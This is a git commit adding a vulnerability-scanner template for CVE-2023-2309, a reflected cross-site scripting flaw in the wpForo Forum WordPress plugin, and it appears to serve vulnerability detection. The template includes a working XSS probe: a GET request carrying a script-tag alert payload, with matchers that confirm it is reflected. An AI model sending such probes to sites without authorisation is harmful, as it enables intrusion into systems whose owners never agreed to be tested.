add CVE-2023-2309

main
Kazgangap 2024-07-11 16:14:35 +03:00
parent 00c6040fa6
commit bbba105bda
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2023-2309
info:
name: wpForo Forum <= 2.1.8 - Cross-Site Scripting
author: securityforeveryone
severity: medium
description: |
The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the wpforo_debug function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
remediation: Fixed in 2.1.9
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-2309
- https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2309
epss-score: 0.00052
epss-percentile: 0.20645
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: gvectors
product: wpforo_forum
framework: wordpress
tags: xss,wpscan,cve,cve2023,wp-plugin
http:
- raw:
- |
GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<script>alert(/document.domain/)</script>") && contains(header,"text/html")'
- 'status_code == 200'
condition: and